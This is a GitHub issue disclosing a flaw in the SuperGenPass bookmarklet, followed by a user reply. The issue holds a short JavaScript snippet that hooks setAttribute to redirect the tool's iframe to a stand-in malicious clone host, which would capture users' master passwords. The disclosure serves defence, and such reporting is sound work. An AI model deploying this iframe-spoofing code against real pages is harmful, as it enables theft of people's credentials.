supergenpass icon indicating copy to clipboard operation
supergenpass copied to clipboard

Published 20 hours ago verified publisher icon chriszarate

Master password entered via bookmarklet can be stolen by spoofing the iframe.

Open aishikaty opened this issue 6 years ago • 1 comments

Here is a code that detects opening of SGP and replaces URL of the created iframe. I could than create a copy of SGP and add a script for sending the master password to my server. User wouldn't notice anything suspicious as they don't see the real iframe's URL.

var originalSetAttribute = Element.prototype.setAttribute
Element.prototype.setAttribute = function (name, value) {
  if (value == "https://chriszarate.github.io/supergenpass/mobile/") {
    this.onload = () => {
      this.setAttribute("src", "https://www.malicious-clone-of-sgp.com/supergenpass/mobile/")
      this.onload = null
    }
  }
  originalSetAttribute.call(this, name, value)
}

aishikaty avatar Apr 15 '18 20:04 aishikaty

yet another reason to download these sorts of browser based tools and run them locally in their own separate window, as it is not that hard to copy and paste from one window to another.

already mentioned in https://github.com/chriszarate/supergenpass/issues/75#issuecomment-464920709

jmichael2497 avatar Feb 18 '19 23:02 jmichael2497